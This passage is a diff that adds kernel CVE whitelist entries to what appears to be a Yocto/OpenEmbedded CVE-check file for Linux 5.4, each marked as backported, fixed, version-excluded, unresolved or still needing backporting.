+CVE_CHECK_WHITELIST += "CVE-2020-12652"
+
+# cpe-stable-backport: Backported in 5.4.20
+CVE_CHECK_WHITELIST += "CVE-2020-12653"
+
+# cpe-stable-backport: Backported in 5.4.20
+CVE_CHECK_WHITELIST += "CVE-2020-12654"
+
+# cpe-stable-backport: Backported in 5.4.50
+CVE_CHECK_WHITELIST += "CVE-2020-12655"
+
+# cpe-stable-backport: Backported in 5.4.56
+CVE_CHECK_WHITELIST += "CVE-2020-12656"
+
+# cpe-stable-backport: Backported in 5.4.33
+CVE_CHECK_WHITELIST += "CVE-2020-12657"
+
+# cpe-stable-backport: Backported in 5.4.35
+CVE_CHECK_WHITELIST += "CVE-2020-12659"
+
+# cpe-stable-backport: Backported in 5.4.43
+CVE_CHECK_WHITELIST += "CVE-2020-12768"
+
+# cpe-stable-backport: Backported in 5.4.17
+CVE_CHECK_WHITELIST += "CVE-2020-12769"
+
+# cpe-stable-backport: Backported in 5.4.42
+CVE_CHECK_WHITELIST += "CVE-2020-12770"
+
+# cpe-stable-backport: Backported in 5.4.49
+CVE_CHECK_WHITELIST += "CVE-2020-12771"
+
+# cpe-stable-backport: Backported in 5.4.33
+CVE_CHECK_WHITELIST += "CVE-2020-12826"
+
+# cpe-stable-backport: Backported in 5.4.64
+CVE_CHECK_WHITELIST += "CVE-2020-12888"
+
+# fixed-version: only affects 5.8rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2020-12912"
+
+# cpe-stable-backport: Backported in 5.4.42
+CVE_CHECK_WHITELIST += "CVE-2020-13143"
+
+# cpe-stable-backport: Backported in 5.4.46
+CVE_CHECK_WHITELIST += "CVE-2020-13974"
+
+# CVE-2020-14304 has no known resolution
+
+# fixed-version: Fixed after version 4.12rc1
+CVE_CHECK_WHITELIST += "CVE-2020-14305"
+
+# cpe-stable-backport: Backported in 5.4.61
+CVE_CHECK_WHITELIST += "CVE-2020-14314"
+
+# cpe-stable-backport: Backported in 5.4.58
+CVE_CHECK_WHITELIST += "CVE-2020-14331"
+
+# cpe-stable-backport: Backported in 5.4.78
+CVE_CHECK_WHITELIST += "CVE-2020-14351"
+
+# fixed-version: Fixed after version 4.14rc3
+CVE_CHECK_WHITELIST += "CVE-2020-14353"
+
+# cpe-stable-backport: Backported in 5.4.53
+CVE_CHECK_WHITELIST += "CVE-2020-14356"
+
+# cpe-stable-backport: Backported in 5.4.28
+CVE_CHECK_WHITELIST += "CVE-2020-14381"
+
+# cpe-stable-backport: Backported in 5.4.64
+CVE_CHECK_WHITELIST += "CVE-2020-14385"
+
+# cpe-stable-backport: Backported in 5.4.64
+CVE_CHECK_WHITELIST += "CVE-2020-14386"
+
+# cpe-stable-backport: Backported in 5.4.66
+CVE_CHECK_WHITELIST += "CVE-2020-14390"
+
+# cpe-stable-backport: Backported in 5.4.16
+CVE_CHECK_WHITELIST += "CVE-2020-14416"
+
+# cpe-stable-backport: Backported in 5.4.51
+CVE_CHECK_WHITELIST += "CVE-2020-15393"
+
+# cpe-stable-backport: Backported in 5.4.49
+CVE_CHECK_WHITELIST += "CVE-2020-15436"
+
+# cpe-stable-backport: Backported in 5.4.54
+CVE_CHECK_WHITELIST += "CVE-2020-15437"
+
+# cpe-stable-backport: Backported in 5.4.50
+CVE_CHECK_WHITELIST += "CVE-2020-15780"
+
+# CVE-2020-15802 has no known resolution
+
+# fixed-version: only affects 5.5rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2020-15852"
+
+# cpe-stable-backport: Backported in 5.4.148
+CVE_CHECK_WHITELIST += "CVE-2020-16119"
+
+# CVE-2020-16120 needs backporting (fixed from 5.8rc1)
+
+# cpe-stable-backport: Backported in 5.4.57
+CVE_CHECK_WHITELIST += "CVE-2020-16166"
+
+# cpe-stable-backport: Backported in 5.4.5
+CVE_CHECK_WHITELIST += "CVE-2020-1749"
+
+# cpe-stable-backport: Backported in 5.4.51
+CVE_CHECK_WHITELIST += "CVE-2020-24394"
+
+# cpe-stable-backport: Backported in 5.4.56
+CVE_CHECK_WHITELIST += "CVE-2020-24490"
+
+# CVE-2020-24502 has no known resolution
+
+# CVE-2020-24503 has no known resolution
+
+# CVE-2020-24504 needs backporting (fixed from 5.12rc1)
+
+# cpe-stable-backport: Backported in 5.4.124
+CVE_CHECK_WHITELIST += "CVE-2020-24586"
+
+# cpe-stable-backport: Backported in 5.4.124
+CVE_CHECK_WHITELIST += "CVE-2020-24587"
+
+# cpe-stable-backport: Backported in 5.4.124
+CVE_CHECK_WHITELIST += "CVE-2020-24588"
+
+# cpe-stable-backport: Backported in 5.4.70
+CVE_CHECK_WHITELIST += "CVE-2020-25211"
+
+# cpe-stable-backport: Backported in 5.4.60
+CVE_CHECK_WHITELIST += "CVE-2020-25212"
+
+# CVE-2020-25220 has no known resolution
+
+# fixed-version: only affects 5.7rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2020-25221"
+
+# cpe-stable-backport: Backported in 5.4.66
+CVE_CHECK_WHITELIST += "CVE-2020-25284"
+
+# cpe-stable-backport: Backported in 5.4.64
+CVE_CHECK_WHITELIST += "CVE-2020-25285"
+
+# cpe-stable-backport: Backported in 5.4.102
+CVE_CHECK_WHITELIST += "CVE-2020-25639"
+
+# cpe-stable-backport: Backported in 5.4.64
+CVE_CHECK_WHITELIST += "CVE-2020-25641"
+
+# cpe-stable-backport: Backported in 5.4.68
+CVE_CHECK_WHITELIST += "CVE-2020-25643"
+
+# cpe-stable-backport: Backported in 5.4.68
+CVE_CHECK_WHITELIST += "CVE-2020-25645"
+
+# cpe-stable-backport: Backported in 5.4.75
+CVE_CHECK_WHITELIST += "CVE-2020-25656"
+
+# CVE-2020-25661 has no known resolution
+
+# CVE-2020-25662 has no known resolution
+
+# cpe-stable-backport: Backported in 5.4.75
+CVE_CHECK_WHITELIST += "CVE-2020-25668"
+
+# cpe-stable-backport: Backported in 5.4.79
+CVE_CHECK_WHITELIST += "CVE-2020-25669"
+
+# cpe-stable-backport: Backported in 5.4.112
+CVE_CHECK_WHITELIST += "CVE-2020-25670"
+
+# cpe-stable-backport: Backported in 5.4.112
+CVE_CHECK_WHITELIST += "CVE-2020-25671"
+
+# cpe-stable-backport: Backported in 5.4.112
+CVE_CHECK_WHITELIST += "CVE-2020-25672"
+
+# cpe-stable-backport: Backported in 5.4.112
+CVE_CHECK_WHITELIST += "CVE-2020-25673"
+
+# cpe-stable-backport: Backported in 5.4.76
+CVE_CHECK_WHITELIST += "CVE-2020-25704"
+
+# cpe-stable-backport: Backported in 5.4.73
+CVE_CHECK_WHITELIST += "CVE-2020-25705"
+
+# cpe-stable-backport: Backported in 5.4.59
+CVE_CHECK_WHITELIST += "CVE-2020-26088"
+
+# cpe-stable-backport: Backported in 5.4.124
+CVE_CHECK_WHITELIST += "CVE-2020-26139"
+
+# CVE-2020-26140 has no known resolution
+
+# cpe-stable-backport: Backported in 5.4.124
+CVE_CHECK_WHITELIST += "CVE-2020-26141"
+
+# CVE-2020-26142 has no known resolution
+
+# CVE-2020-26143 has no known resolution
+
+# cpe-stable-backport: Backported in 5.4.124
+CVE_CHECK_WHITELIST += "CVE-2020-26145"
+
+# cpe-stable-backport: Backported in 5.4.124
+CVE_CHECK_WHITELIST += "CVE-2020-26147"
+
+# cpe-stable-backport: Backported in 5.4.129
+CVE_CHECK_WHITELIST += "CVE-2020-26541"
+
+# cpe-stable-backport: Backported in 5.4.122
+CVE_CHECK_WHITELIST += "CVE-2020-26555"
+
+# CVE-2020-26556 has no known resolution
+
+# CVE-2020-26557 has no known resolution
+
+# cpe-stable-backport: Backported in 5.4.122
+CVE_CHECK_WHITELIST += "CVE-2020-26558"
+
+# CVE-2020-26559 has no known resolution
+
+# CVE-2020-26560 has no known resolution
+
+# cpe-stable-backport: Backported in 5.4.29
+CVE_CHECK_WHITELIST += "CVE-2020-27066"
+
+# fixed-version: Fixed after version 4.14rc4
+CVE_CHECK_WHITELIST += "CVE-2020-27067"
+
+# cpe-stable-backport: Backported in 5.4.24
+CVE_CHECK_WHITELIST += "CVE-2020-27068"
+
+# fixed-version: only affects 5.6rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2020-27152"
+
+# fixed-version: only affects 5.10rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2020-27170"
+
+# fixed-version: only affects 5.10rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2020-27171"
+
+# fixed-version: only affects 5.7rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2020-27194"
+
+# cpe-stable-backport: Backported in 5.4.23
+CVE_CHECK_WHITELIST += "CVE-2020-2732"
+
+# cpe-stable-backport: Backported in 5.4.25
+CVE_CHECK_WHITELIST += "CVE-2020-27418"
+
+# cpe-stable-backport: Backported in 5.4.75
+CVE_CHECK_WHITELIST += "CVE-2020-27673"
+
+# cpe-stable-backport: Backported in 5.4.75
+CVE_CHECK_WHITELIST += "CVE-2020-27675"
+
+# cpe-stable-backport: Backported in 5.4.75
+CVE_CHECK_WHITELIST += "CVE-2020-27777"
+
+# cpe-stable-backport: Backported in 5.4.73
+CVE_CHECK_WHITELIST += "CVE-2020-27784"
+
+# cpe-stable-backport: Backported in 5.4.42
+CVE_CHECK_WHITELIST += "CVE-2020-27786"
+
+# cpe-stable-backport: Backported in 5.4.86
+CVE_CHECK_WHITELIST += "CVE-2020-27815"
+
+# cpe-stable-backport: Backported in 5.4.162
+CVE_CHECK_WHITELIST += "CVE-2020-27820"
+
+# cpe-stable-backport: Backported in 5.4.94
+CVE_CHECK_WHITELIST += "CVE-2020-27825"
+
+# cpe-stable-backport: Backported in 5.4.83
+CVE_CHECK_WHITELIST += "CVE-2020-27830"
+
+# CVE-2020-27835 needs backporting (fixed from 5.10rc6)
+
+# cpe-stable-backport: Backported in 5.4.66
+CVE_CHECK_WHITELIST += "CVE-2020-28097"
+
+# cpe-stable-backport: Backported in 5.4.89
+CVE_CHECK_WHITELIST += "CVE-2020-28374"
+
+# cpe-stable-backport: Backported in 5.4.83
+CVE_CHECK_WHITELIST += "CVE-2020-28588"
+
+# cpe-stable-backport: Backported in 5.4.71
+CVE_CHECK_WHITELIST += "CVE-2020-28915"
+
+# cpe-stable-backport: Backported in 5.4.80
+CVE_CHECK_WHITELIST += "CVE-2020-28941"
+
+# cpe-stable-backport: Backported in 5.4.76
+CVE_CHECK_WHITELIST += "CVE-2020-28974"
+
+# cpe-stable-backport: Backported in 5.4.48
+CVE_CHECK_WHITELIST += "CVE-2020-29368"
+
+# cpe-stable-backport: Backported in 5.4.54
+CVE_CHECK_WHITELIST += "CVE-2020-29369"
+
+# cpe-stable-backport: Backported in 5.4.27
+CVE_CHECK_WHITELIST += "CVE-2020-29370"
+
+# cpe-stable-backport: Backported in 5.4.61
+CVE_CHECK_WHITELIST += "CVE-2020-29371"
+
+# fixed-version: only affects 5.6rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2020-29372"
+
+# CVE-2020-29373 needs backporting (fixed from 5.6rc2)
+
+# cpe-stable-backport: Backported in 5.4.47
+CVE_CHECK_WHITELIST += "CVE-2020-29374"
+
+# CVE-2020-29534 needs backporting (fixed from 5.10rc1)
+
+# cpe-stable-backport: Backported in 5.4.86
+CVE_CHECK_WHITELIST += "CVE-2020-29568"
+
+# cpe-stable-backport: Backported in 5.4.86
+CVE_CHECK_WHITELIST += "CVE-2020-29569"
+
+# cpe-stable-backport: Backported in 5.4.83
+CVE_CHECK_WHITELIST += "CVE-2020-29660"
+
+# cpe-stable-backport: Backported in 5.4.83
+CVE_CHECK_WHITELIST += "CVE-2020-29661"
+
+# fixed-version: only affects 5.10rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2020-35499"
+
+# CVE-2020-35501 has no known resolution
+
+# cpe-stable-backport: Backported in 5.4.76
+CVE_CHECK_WHITELIST += "CVE-2020-35508"
+
+# fixed-version: Fixed after version 4.17rc1
+CVE_CHECK_WHITELIST += "CVE-2020-35513"
+
+# cpe-stable-backport: Backported in 5.4.82
+CVE_CHECK_WHITELIST += "CVE-2020-35519"
+
+# cpe-stable-backport: Backported in 5.4.88
+CVE_CHECK_WHITELIST += "CVE-2020-36158"
+
+# CVE-2020-36310 needs backporting (fixed from 5.8rc1)
+
+# cpe-stable-backport: Backported in 5.4.131
+CVE_CHECK_WHITELIST += "CVE-2020-36311"
+
+# cpe-stable-backport: Backported in 5.4.66
+CVE_CHECK_WHITELIST += "CVE-2020-36312"
+
+# fixed-version: only affects 5.7rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2020-36313"
+
+# cpe-stable-backport: Backported in 5.4.88
+CVE_CHECK_WHITELIST += "CVE-2020-36322"
+
+# CVE-2020-36385 needs backporting (fixed from 5.10rc1)
+
+# cpe-stable-backport: Backported in 5.4.58
+CVE_CHECK_WHITELIST += "CVE-2020-36386"
+
+# fixed-version: only affects 5.7rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2020-36387"
+
+# cpe-stable-backport: Backported in 5.4.176
+CVE_CHECK_WHITELIST += "CVE-2020-36516"
+
+# cpe-stable-backport: Backported in 5.4.30
+CVE_CHECK_WHITELIST += "CVE-2020-36557"
+
+# cpe-stable-backport: Backported in 5.4.23
+CVE_CHECK_WHITELIST += "CVE-2020-36558"
+
+# CVE-2020-36691 needs backporting (fixed from 5.8rc1)
+
+# cpe-stable-backport: Backported in 5.4.86
+CVE_CHECK_WHITELIST += "CVE-2020-36694"
+
+# cpe-stable-backport: Backported in 5.4.62
+CVE_CHECK_WHITELIST += "CVE-2020-36766"
+
+# cpe-stable-backport: Backported in 5.4.189
+CVE_CHECK_WHITELIST += "CVE-2020-36775"
+
+# fixed-version: only affects 5.8rc4 onwards
+CVE_CHECK_WHITELIST += "CVE-2020-36776"
+
+# cpe-stable-backport: Backported in 5.4.118
+CVE_CHECK_WHITELIST += "CVE-2020-36777"
+
+# fixed-version: only affects 5.6rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2020-36778"
+
+# fixed-version: only affects 5.6rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2020-36779"
+
+# cpe-stable-backport: Backported in 5.4.119
+CVE_CHECK_WHITELIST += "CVE-2020-36780"
+
+# CVE-2020-36781 needs backporting (fixed from 5.13rc1)
+
+# cpe-stable-backport: Backported in 5.4.119
+CVE_CHECK_WHITELIST += "CVE-2020-36782"
+
+# cpe-stable-backport: Backported in 5.4.119
+CVE_CHECK_WHITELIST += "CVE-2020-36783"
+
+# CVE-2020-36784 needs backporting (fixed from 5.13rc1)
+
+# fixed-version: only affects 5.8rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2020-36785"
+
+# fixed-version: only affects 5.10rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2020-36786"
+
+# cpe-stable-backport: Backported in 5.4.119
+CVE_CHECK_WHITELIST += "CVE-2020-36787"
+
+# cpe-stable-backport: Backported in 5.4.143
+CVE_CHECK_WHITELIST += "CVE-2020-3702"
+
+# cpe-stable-backport: Backported in 5.4.79
+CVE_CHECK_WHITELIST += "CVE-2020-4788"
+
+# fixed-version: Fixed after version 5.2rc1
+CVE_CHECK_WHITELIST += "CVE-2020-7053"
+
+# cpe-stable-backport: Backported in 5.4.16
+CVE_CHECK_WHITELIST += "CVE-2020-8428"
+
+# cpe-stable-backport: Backported in 5.4.25
+CVE_CHECK_WHITELIST += "CVE-2020-8647"
+
+# cpe-stable-backport: Backported in 5.4.25
+CVE_CHECK_WHITELIST += "CVE-2020-8648"
+
+# cpe-stable-backport: Backported in 5.4.25
+CVE_CHECK_WHITELIST += "CVE-2020-8649"
+
+# cpe-stable-backport: Backported in 5.4.77
+CVE_CHECK_WHITELIST += "CVE-2020-8694"
+
+# CVE-2020-8832 has no known resolution
+
+# fixed-version: Fixed after version 4.18rc1
+CVE_CHECK_WHITELIST += "CVE-2020-8834"
+
+# fixed-version: only affects 5.5rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2020-8835"
+
+# cpe-stable-backport: Backported in 5.4.21
+CVE_CHECK_WHITELIST += "CVE-2020-8992"
+
+# cpe-stable-backport: Backported in 5.4.23
+CVE_CHECK_WHITELIST += "CVE-2020-9383"
+
+# cpe-stable-backport: Backported in 5.4.23
+CVE_CHECK_WHITELIST += "CVE-2020-9391"
+
+# cpe-stable-backport: Backported in 5.4.122
+CVE_CHECK_WHITELIST += "CVE-2021-0129"
+
+# cpe-stable-backport: Backported in 5.4.47
+CVE_CHECK_WHITELIST += "CVE-2021-0342"
+
+# CVE-2021-0399 has no known resolution
+
+# fixed-version: Fixed after version 4.15rc1
+CVE_CHECK_WHITELIST += "CVE-2021-0447"
+
+# cpe-stable-backport: Backported in 5.4.70
+CVE_CHECK_WHITELIST += "CVE-2021-0448"
+
+# cpe-stable-backport: Backported in 5.4.101
+CVE_CHECK_WHITELIST += "CVE-2021-0512"
+
+# cpe-stable-backport: Backported in 5.4.68
+CVE_CHECK_WHITELIST += "CVE-2021-0605"
+
+# CVE-2021-0606 has no known resolution
+
+# CVE-2021-0695 has no known resolution
+
+# fixed-version: only affects 5.8rc4 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-0707"
+
+# cpe-stable-backport: Backported in 5.4.137
+CVE_CHECK_WHITELIST += "CVE-2021-0920"
+
+# CVE-2021-0924 has no known resolution
+
+# CVE-2021-0929 needs backporting (fixed from 5.6rc1)
+
+# fixed-version: Fixed after version 4.16rc7
+CVE_CHECK_WHITELIST += "CVE-2021-0935"
+
+# CVE-2021-0936 has no known resolution
+
+# cpe-stable-backport: Backported in 5.4.113
+CVE_CHECK_WHITELIST += "CVE-2021-0937"
+
+# cpe-stable-backport: Backported in 5.4.84
+CVE_CHECK_WHITELIST += "CVE-2021-0938"
+
+# cpe-stable-backport: Backported in 5.4.110
+CVE_CHECK_WHITELIST += "CVE-2021-0941"
+
+# CVE-2021-0961 has no known resolution
+
+# fixed-version: only affects 5.9rc2 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-1048"
+
+# CVE-2021-20177 needs backporting (fixed from 5.5rc1)
+
+# fixed-version: only affects 5.5rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-20194"
+
+# CVE-2021-20219 has no known resolution
+
+# fixed-version: only affects 5.5rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-20226"
+
+# CVE-2021-20239 needs backporting (fixed from 5.9rc1)
+
+# fixed-version: Fixed after version 4.5rc5
+CVE_CHECK_WHITELIST += "CVE-2021-20261"
+
+# fixed-version: Fixed after version 4.5rc3
+CVE_CHECK_WHITELIST += "CVE-2021-20265"
+
+# fixed-version: only affects 5.7rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-20268"
+
+# cpe-stable-backport: Backported in 5.4.59
+CVE_CHECK_WHITELIST += "CVE-2021-20292"
+
+# fixed-version: Fixed after version 5.4rc1
+CVE_CHECK_WHITELIST += "CVE-2021-20317"
+
+# cpe-stable-backport: Backported in 5.4.148
+CVE_CHECK_WHITELIST += "CVE-2021-20320"
+
+# cpe-stable-backport: Backported in 5.4.153
+CVE_CHECK_WHITELIST += "CVE-2021-20321"
+
+# cpe-stable-backport: Backported in 5.4.146
+CVE_CHECK_WHITELIST += "CVE-2021-20322"
+
+# cpe-stable-backport: Backported in 5.4.99
+CVE_CHECK_WHITELIST += "CVE-2021-21781"
+
+# cpe-stable-backport: Backported in 5.4.129
+CVE_CHECK_WHITELIST += "CVE-2021-22543"
+
+# cpe-stable-backport: Backported in 5.4.113
+CVE_CHECK_WHITELIST += "CVE-2021-22555"
+
+# fixed-version: only affects 5.6 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-22600"
+
+# cpe-stable-backport: Backported in 5.4.114
+CVE_CHECK_WHITELIST += "CVE-2021-23133"
+
+# fixed-version: only affects 5.12rc7 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-23134"
+
+# cpe-stable-backport: Backported in 5.4.184
+CVE_CHECK_WHITELIST += "CVE-2021-26401"
+
+# fixed-version: only affects 5.5rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-26708"
+
+# cpe-stable-backport: Backported in 5.4.100
+CVE_CHECK_WHITELIST += "CVE-2021-26930"
+
+# cpe-stable-backport: Backported in 5.4.100
+CVE_CHECK_WHITELIST += "CVE-2021-26931"
+
+# cpe-stable-backport: Backported in 5.4.100
+CVE_CHECK_WHITELIST += "CVE-2021-26932"
+
+# CVE-2021-26934 has no known resolution
+
+# cpe-stable-backport: Backported in 5.4.103
+CVE_CHECK_WHITELIST += "CVE-2021-27363"
+
+# cpe-stable-backport: Backported in 5.4.103
+CVE_CHECK_WHITELIST += "CVE-2021-27364"
+
+# cpe-stable-backport: Backported in 5.4.103
+CVE_CHECK_WHITELIST += "CVE-2021-27365"
+
+# cpe-stable-backport: Backported in 5.4.103
+CVE_CHECK_WHITELIST += "CVE-2021-28038"
+
+# fixed-version: only affects 5.9rc4 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-28039"
+
+# cpe-stable-backport: Backported in 5.4.106
+CVE_CHECK_WHITELIST += "CVE-2021-28375"
+
+# cpe-stable-backport: Backported in 5.4.106
+CVE_CHECK_WHITELIST += "CVE-2021-28660"
+
+# cpe-stable-backport: Backported in 5.4.109
+CVE_CHECK_WHITELIST += "CVE-2021-28688"
+
+# fixed-version: only affects 5.5rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-28691"
+
+# cpe-stable-backport: Backported in 5.4.168
+CVE_CHECK_WHITELIST += "CVE-2021-28711"
+
+# cpe-stable-backport: Backported in 5.4.168
+CVE_CHECK_WHITELIST += "CVE-2021-28712"
+
+# cpe-stable-backport: Backported in 5.4.168
+CVE_CHECK_WHITELIST += "CVE-2021-28713"
+
+# cpe-stable-backport: Backported in 5.4.168
+CVE_CHECK_WHITELIST += "CVE-2021-28714"
+
+# cpe-stable-backport: Backported in 5.4.168
+CVE_CHECK_WHITELIST += "CVE-2021-28715"
+
+# fixed-version: only affects 5.11rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-28950"
+
+# fixed-version: only affects 5.10rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-28951"
+
+# fixed-version: only affects 5.7rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-28952"
+
+# cpe-stable-backport: Backported in 5.4.108
+CVE_CHECK_WHITELIST += "CVE-2021-28964"
+
+# cpe-stable-backport: Backported in 5.4.108
+CVE_CHECK_WHITELIST += "CVE-2021-28971"
+
+# cpe-stable-backport: Backported in 5.4.108
+CVE_CHECK_WHITELIST += "CVE-2021-28972"
+
+# cpe-stable-backport: Backported in 5.4.111
+CVE_CHECK_WHITELIST += "CVE-2021-29154"
+
+# CVE-2021-29155 needs backporting (fixed from 5.12rc8)
+
+# cpe-stable-backport: Backported in 5.4.109
+CVE_CHECK_WHITELIST += "CVE-2021-29264"
+
+# cpe-stable-backport: Backported in 5.4.106
+CVE_CHECK_WHITELIST += "CVE-2021-29265"
+
+# fixed-version: only affects 5.8rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-29266"
+
+# fixed-version: only affects 5.5rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-29646"
+
+# cpe-stable-backport: Backported in 5.4.109
+CVE_CHECK_WHITELIST += "CVE-2021-29647"
+
+# fixed-version: only affects 5.11rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-29648"
+
+# fixed-version: only affects 5.10rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-29649"
+
+# cpe-stable-backport: Backported in 5.4.109
+CVE_CHECK_WHITELIST += "CVE-2021-29650"
+
+# fixed-version: only affects 5.10rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-29657"
+
+# cpe-stable-backport: Backported in 5.4.103
+CVE_CHECK_WHITELIST += "CVE-2021-30002"
+
+# fixed-version: only affects 5.12rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-30178"
+
+# fixed-version: only affects 5.7rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-31440"
+
+# cpe-stable-backport: Backported in 5.4.92
+CVE_CHECK_WHITELIST += "CVE-2021-3178"
+
+# cpe-stable-backport: Backported in 5.4.117
+CVE_CHECK_WHITELIST += "CVE-2021-31829"
+
+# cpe-stable-backport: Backported in 5.4.109
+CVE_CHECK_WHITELIST += "CVE-2021-31916"
+
+# CVE-2021-32078 needs backporting (fixed from 5.13rc1)
+
+# cpe-stable-backport: Backported in 5.4.119
+CVE_CHECK_WHITELIST += "CVE-2021-32399"
+
+# fixed-version: only affects 5.11rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-32606"
+
+# cpe-stable-backport: Backported in 5.4.106
+CVE_CHECK_WHITELIST += "CVE-2021-33033"
+
+# cpe-stable-backport: Backported in 5.4.119
+CVE_CHECK_WHITELIST += "CVE-2021-33034"
+
+# CVE-2021-33061 needs backporting (fixed from 5.18rc1)
+
+# cpe-stable-backport: Backported in 5.4.124
+CVE_CHECK_WHITELIST += "CVE-2021-33098"
+
+# fixed-version: only affects 5.11rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-33135"
+
+# fixed-version: only affects 5.12rc8 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-33200"
+
+# cpe-stable-backport: Backported in 5.4.94
+CVE_CHECK_WHITELIST += "CVE-2021-3347"
+
+# cpe-stable-backport: Backported in 5.4.95
+CVE_CHECK_WHITELIST += "CVE-2021-3348"
+
+# cpe-stable-backport: Backported in 5.4.139
+CVE_CHECK_WHITELIST += "CVE-2021-33624"
+
+# fixed-version: Fixed after version 5.4rc1
+CVE_CHECK_WHITELIST += "CVE-2021-33630"
+
+# cpe-stable-backport: Backported in 5.4.240
+CVE_CHECK_WHITELIST += "CVE-2021-33631"
+
+# cpe-stable-backport: Backported in 5.4.205
+CVE_CHECK_WHITELIST += "CVE-2021-33655"
+
+# cpe-stable-backport: Backported in 5.4.202
+CVE_CHECK_WHITELIST += "CVE-2021-33656"
+
+# cpe-stable-backport: Backported in 5.4.134
+CVE_CHECK_WHITELIST += "CVE-2021-33909"
+
+# fixed-version: only affects 5.5rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-3411"
+
+# cpe-stable-backport: Backported in 5.4.62
+CVE_CHECK_WHITELIST += "CVE-2021-3428"
+
+# cpe-stable-backport: Backported in 5.4.101
+CVE_CHECK_WHITELIST += "CVE-2021-3444"
+
+# cpe-stable-backport: Backported in 5.4.146
+CVE_CHECK_WHITELIST += "CVE-2021-34556"
+
+# cpe-stable-backport: Backported in 5.4.128
+CVE_CHECK_WHITELIST += "CVE-2021-34693"
+
+# cpe-stable-backport: Backported in 5.4.110
+CVE_CHECK_WHITELIST += "CVE-2021-3483"
+
+# fixed-version: only affects 5.8rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-34866"
+
+# fixed-version: only affects 5.8rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-3489"
+
+# fixed-version: only affects 5.7rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-3490"
+
+# fixed-version: only affects 5.7rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-3491"
+
+# CVE-2021-3492 has no known resolution
+
+# CVE-2021-3493 needs backporting (fixed from 5.11rc1)
+
+# cpe-stable-backport: Backported in 5.4.124
+CVE_CHECK_WHITELIST += "CVE-2021-34981"
+
+# fixed-version: only affects 5.9rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-3501"
+
+# cpe-stable-backport: Backported in 5.4.129
+CVE_CHECK_WHITELIST += "CVE-2021-35039"
+
+# cpe-stable-backport: Backported in 5.4.118
+CVE_CHECK_WHITELIST += "CVE-2021-3506"
+
+# CVE-2021-3542 has no known resolution
+
+# fixed-version: only affects 5.10rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-3543"
+
+# cpe-stable-backport: Backported in 5.4.146
+CVE_CHECK_WHITELIST += "CVE-2021-35477"
+
+# cpe-stable-backport: Backported in 5.4.125
+CVE_CHECK_WHITELIST += "CVE-2021-3564"
+
+# cpe-stable-backport: Backported in 5.4.125
+CVE_CHECK_WHITELIST += "CVE-2021-3573"
+
+# cpe-stable-backport: Backported in 5.4.125
+CVE_CHECK_WHITELIST += "CVE-2021-3587"
+
+# cpe-stable-backport: Backported in 5.4.98
+CVE_CHECK_WHITELIST += "CVE-2021-3600"
+
+# cpe-stable-backport: Backported in 5.4.132
+CVE_CHECK_WHITELIST += "CVE-2021-3609"
+
+# cpe-stable-backport: Backported in 5.4.102
+CVE_CHECK_WHITELIST += "CVE-2021-3612"
+
+# cpe-stable-backport: Backported in 5.4.14
+CVE_CHECK_WHITELIST += "CVE-2021-3635"
+
+# cpe-stable-backport: Backported in 5.4.160
+CVE_CHECK_WHITELIST += "CVE-2021-3640"
+
+# cpe-stable-backport: Backported in 5.4.142
+CVE_CHECK_WHITELIST += "CVE-2021-3653"
+
+# cpe-stable-backport: Backported in 5.4.133
+CVE_CHECK_WHITELIST += "CVE-2021-3655"
+
+# cpe-stable-backport: Backported in 5.4.142
+CVE_CHECK_WHITELIST += "CVE-2021-3656"
+
+# cpe-stable-backport: Backported in 5.4.112
+CVE_CHECK_WHITELIST += "CVE-2021-3659"
+
+# CVE-2021-3669 needs backporting (fixed from 5.15rc1)
+
+# cpe-stable-backport: Backported in 5.4.136
+CVE_CHECK_WHITELIST += "CVE-2021-3679"
+
+# CVE-2021-3714 has no known resolution
+
+# cpe-stable-backport: Backported in 5.4.29
+CVE_CHECK_WHITELIST += "CVE-2021-3715"
+
+# cpe-stable-backport: Backported in 5.4.151
+CVE_CHECK_WHITELIST += "CVE-2021-37159"
+
+# cpe-stable-backport: Backported in 5.4.141
+CVE_CHECK_WHITELIST += "CVE-2021-3732"
